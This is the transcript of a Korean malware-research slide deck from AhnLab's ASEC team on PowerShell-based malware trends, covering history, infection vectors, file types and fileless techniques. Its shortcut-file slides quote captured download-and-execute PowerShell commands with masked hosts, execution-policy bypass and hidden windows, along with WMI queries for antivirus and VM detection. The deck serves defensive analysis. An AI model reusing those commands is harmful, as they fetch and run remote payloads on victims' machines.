power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판
TRANSCRIPT
PowerMalware ?!
2016.11.18 – 공개판
안랩시큐리티대응센터(ASEC) 분석팀
차민석 (車珉錫, CHA Minseok, Jacky Cha, mstoned7) 책임연구원
PowerShell 를이용한악성코드와기법
© AhnLab, Inc. All rights reserved. 2
:~$whoami
Profile
− 차민석 (車珉錫, CHA Minseok, Jacky Cha, mstoned7)
− 1988년 1월 7일 : Apple ][+ 복제품으로 컴퓨터 시작
− 1989년 : Brain virus 변형 감염
− 1997년 : AhnLab 입사
− AhnLab 책임 연구원 (Senior Malware Researcher)
− 시큐리티 대응센터(ASEC) 분석팀에서
악성코드 분석및 연구 중
- 민간합동 조사단, 사이버보안전문단
- vforum, AVED, AMTSO 멤버
- Wildlist Reporter
© AhnLab, Inc. All rights reserved. 3
:~$whoami
• 책
-보안에미쳐라 (2016)
* Source : http://www.yes24.com/24/goods/29333992
© AhnLab, Inc. All rights reserved. 4
시작하기전에
• 보안이완벽한시스템은이세상에없어
- Matthew Broderick 주연위험한게임 (War Games)
* Source : War Games (1983)
© AhnLab, Inc. All rights reserved. 5
Wrap up
• PowerShell 를이용한악성코드증가
- Windows 7와Windows 10 점유율에따름
-보통Ransomware Downloader로이용
-Targeted Attack 에도이용시작포착
• WMI 이용
-Fileless악성코드제작가능
• 전망
- JS,VBS 와함께PowerShell 악성코드증가예상
-Multi-Platform 악성코드가능성
Contents
01
02
03
04
05
06
07
PowerShell
PowerShell를이용한악성코드
Technique
파일종류
Fileless Technique
Case Study
맺음말
01
PowerShell
© AhnLab, Inc. All rights reserved. 8
PowerShell
• PowerShell
- 2006년공개된Script Language
-Windows Vista 이후기본탑재
* Source : https://msdn.microsoft.com/en-us/powershell
© AhnLab, Inc. All rights reserved. 9
Windows Management Instrumentation (WMI)
• WMI
-
* Source : https://msdn.microsoft.com/en-us/library/aa394582(v=vs.85).aspx
© AhnLab, Inc. All rights reserved. 10
Windows Management Instrumentation (WMI)
• WMI Architecture
-
* Source : http://oversitesentry.com/blackhat-presentation-wmi-architecture-used-to-attack/
© AhnLab, Inc. All rights reserved. 11
PowerShell + WMI
• AntiVirus제품정보얻기
- get-wmiobject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
© AhnLab, Inc. All rights reserved. 12
PowerShell + WMI
• 가상환경검사
- Get-WmiObject –Class Win32_ComputerSystem
02
PowerShell을이용한악성코드
© AhnLab, Inc. All rights reserved.
Timeline
Monad
발표
1993 1998 2000 2004 2006 2007 2013 2014 2015
Poweliks
2016
PowerShell
공개
PowerShell
+ Macro
등장
VB
Script
악성코드
PowerShell
Downloader
범람
PowerShell
악성코드POC
Macro
virus
2017
Loveletter PowerShell
Ransomware
Kovter향상된Batch
virus
BedepPhase
WMI
이용한Fileless
침해사고
© AhnLab, Inc. All rights reserved. 15
1995 –Macro virus
• 1995년– 2001년 : Macro virus 전성기
-
* Source :
© AhnLab, Inc. All rights reserved. 16
2000 - Loveletter
• 2000년5월4일LoveLetter virus
- email 로전파
- I love you라는메일제목의사회공학기법사용
-그림, 음악파일파괴
© AhnLab, Inc. All rights reserved. 17
2004 –Monad
• 우려
- 2004년Monad 개발
* Source : https://www.virusbulletin.com/conference/vb2004/abstracts/return-script-viruses
© AhnLab, Inc. All rights reserved. 18
2006 - PowerShell 악성코드POC
• PowerShell POC 악성코드
-
* Source : https://www.symantec.com/security_response/writeup.jsp?docid=2006-080216-3625-99&tabid=2
© AhnLab, Inc. All rights reserved. 19
2006 - PowerShell Released
• PowerShell Released
-
* Source : http://www.symantec.com/connect/ru/blogs/powershell-released?page=1
© AhnLab, Inc. All rights reserved. 20
2013 –PowerShell Ransomware
• PowerShell Ransomware 등장
-
* Source : https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/
© AhnLab, Inc. All rights reserved. 21
2014 - Poweliks
• Poweliks
-Registry 내저장
* Source : http://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/
© AhnLab, Inc. All rights reserved. 22
2014 - Phase
• Phase
-2013년발견된Solarbot변형
* Source : http://blog.trendmicro.com/trendlabs-security-intelligence/without-a-trace-fileless-malware-spotted-in-the-wild/
© AhnLab, Inc. All rights reserved. 23
2015 –WMI 악용
• Black Hat 2015
-
* Source : https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-
Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf
© AhnLab, Inc. All rights reserved. 24
2015 - PowerShell 악성코드증가시작
• PowerShell 악성코드증가
-
* Source : https://securelist.com/blog/research/72417/the-rise-of-net-and-powershell-malware/
© AhnLab, Inc. All rights reserved. 25
2016 - Macro + PowerShell
• Macro + PowerShell
-
* Source : http://researchcenter.paloaltonetworks.com/2016/03/powersniff-malware-used-in-macro-based-attacks/
© AhnLab, Inc. All rights reserved. 26
2016 - PowerShell 이용한악성코드유행
• PowerShell 이용한악성코드유행
-
* Source : https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/
03
Technical
© AhnLab, Inc. All rights reserved.
In-the-Wild 악성코드조건
조건
많은사용자
보안체계허점
손쉬운제작
© AhnLab, Inc. All rights reserved.
PowerShell 악성코드장점
장점
강력한기능
손쉬운제작
행위기반제품우회가능성
© AhnLab, Inc. All rights reserved. 30
주요감염경로
• 주요감염경로
− 첨부파일혹은 Link
icon
Web Browser
− Exploit Kit 이용
− Fileless악성코드감염에도이용
© AhnLab, Inc. All rights reserved. 31
감염경로
-
© AhnLab, Inc. All rights reserved. 32
PowerShell 실행
• 실행권한
- DownloadFile명령의개별명령과스크립트실행테스트
-개별명령은실행되지만스크립트는정책상실행되지않음
© AhnLab, Inc. All rights reserved. 33
PowerShell 실행
• Bypass PowerShell execution policies
-
* Source : https://technet.microsoft.com/en-us/library/ee176847.aspx
© AhnLab, Inc. All rights reserved. 34
PowerShell 실행
• Bypass PowerShell execution policies
-
* Source : http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html
© AhnLab, Inc. All rights reserved. 35
기능
• Downloader 혹은Dropper
-
* Source : https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/
04
파일종류
© AhnLab, Inc. All rights reserved.
종류
종류
Office
(DOC, DOCM,
XLS, XLSM)
Shortcut
(LNK)
PowerShell
(PS1)
Windows
Script File
(WSF), HTML
Application
(HTA)
Java Script
/Visual Basic
Script
(JS, JSE,
VBS, VBE,
WSF, HTA)
© AhnLab, Inc. All rights reserved. 38
Java Script - JS
• Java Script (JS)
-
© AhnLab, Inc. All rights reserved. 39
Visual Basic Script
• Visual Basic Script (VBS)
-
© AhnLab, Inc. All rights reserved. 40
Windows Script File (WSF)
• WSF (Windows Script File)
- 대부분Java Script
© AhnLab, Inc. All rights reserved. 41
Windows Script File (WSF)
• WSF (Windows Script File)
-
© AhnLab, Inc. All rights reserved. 42
HTML Application (HTA)
• HTML Application(HTA)
-대부분Java Script
© AhnLab, Inc. All rights reserved. 43
Office (DOC, DOCM, XLS, XLSM)
• Macro 포함문서
-
© AhnLab, Inc. All rights reserved. 44
Shortcut (LNK)
• LNK
-
© AhnLab, Inc. All rights reserved. 45
Shortcut (LNK)
• Download
- %WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe $cmd = 'Start-Process';$b = '%TEMP%\tes'+'t3.e'+'xe'; $a = New-Object
System.Net.WebClient; $a.DownloadFile('http://*****ennox.com/wp-includes/putty.exe','%TEMP%\tes'+'t3.e'+'xe'); &($cmd) -FilePath
$b;
© AhnLab, Inc. All rights reserved. 46
Shortcut (LNK)
• Download
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object
System.Net.WebClient).DownloadFile('http://dire****.com/2D2A/bg.exe','%APPDATA%\Example.exe'); cmd /c '%APPDATA%\Example.exe'
© AhnLab, Inc. All rights reserved. 47
Shortcut (LNK)
• Encoding
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -EncodedCommand UABvAHc………
© AhnLab, Inc. All rights reserved. 48
PowerShell (PS1)
• PowerShell
-
05
Fileless Technique
© AhnLab, Inc. All rights reserved. 50
Fileless
• FilelessTechnique으로이용
-Poweliks
* Source : https://blog.gdatasoftware.com/2014/07/23947-poweliks-the-persistent-malware-without-a-file
© AhnLab, Inc. All rights reserved. 51
Fileless
• FilelessTechnique으로이용
-Poweliks
© AhnLab, Inc. All rights reserved. 52
Fileless악성코드
• Kovter
- Run 항목읽을수없음
© AhnLab, Inc. All rights reserved. 53
Fileless악성코드
• Kovter
-mshta.exe를통해Script 실행
© AhnLab, Inc. All rights reserved. 54
Fileless악성코드
• Kovter
-인코딩된데이터
06
Case Study
07
맺음말
© AhnLab, Inc. All rights reserved. 57
Error
• Windows PowerShell 작동중지
- 갑자기Windows PowerShell 에러가발생할수있음
© AhnLab, Inc. All rights reserved. 58
Response
• WMI for Detection and Response
-
* Source : https://ics-cert.us-cert.gov/sites/default/files/documents/WMI_for_Detection_and_Response_S508C.pdf
© AhnLab, Inc. All rights reserved. 59
전망
• PowerShell의확장
-
* Source : https://blogs.msdn.microsoft.com/powershell/2016/08/18/powershell-on-linux-and-open-source-2
© AhnLab, Inc. All rights reserved.
전망
전망
JS, VBS
대체?!
Obfuscation Cross-Platform
© AhnLab, Inc. All rights reserved. 61
Wrap up
• PowerShell 를이용한악성코드증가
- Windows 7와Windows 10 점유율에따름
-보통Ransomware Downloader로이용
-Targeted Attack 에도이용시작포착
• WMI 이용
-Fileless악성코드제작가능
• 전망
- JS,VBS 와함께PowerShell 악성코드증가예상
-Multi-Platform 악성코드가능성
© AhnLab, Inc. All rights reserved. 62
현재의보안문제
• Not really a fair fight
* source : http://image-store.slidesharecdn.com/81268b95-5c3b-4604-9129-d83ab3dc4600-large.png
© AhnLab, Inc. All rights reserved. 63
현재의보안문제
• 모두가함께해야하는보안
* source : http://www.security-marathon.be/?p=1786
© AhnLab, Inc. All rights reserved. 64
Q&A
email : [email protected] / [email protected]
http://xcoolcat7.tistory.com
https://twitter.com/xcoolcat7, https://twitter.com/mstoned7
© AhnLab, Inc. All rights reserved. 65
Reference
• Ryan Kazanciyan & Matt Hastings, ‘Investigating PowerShell Attack’, 2014
• Matt Graeber, ‘Abusing Windows Management Instrumentation (WMI) to Build a Persistent,
Asyncronous, and FilelessBackdoor’, 2015
• Santiago M. Pontiroli & F. Roberto Martinez , ‘The Tao of .NET and PowerShell Malware Analysis’, 2015
• 김승훈/AhnLab, ‘매크로다운로더분석’, 2016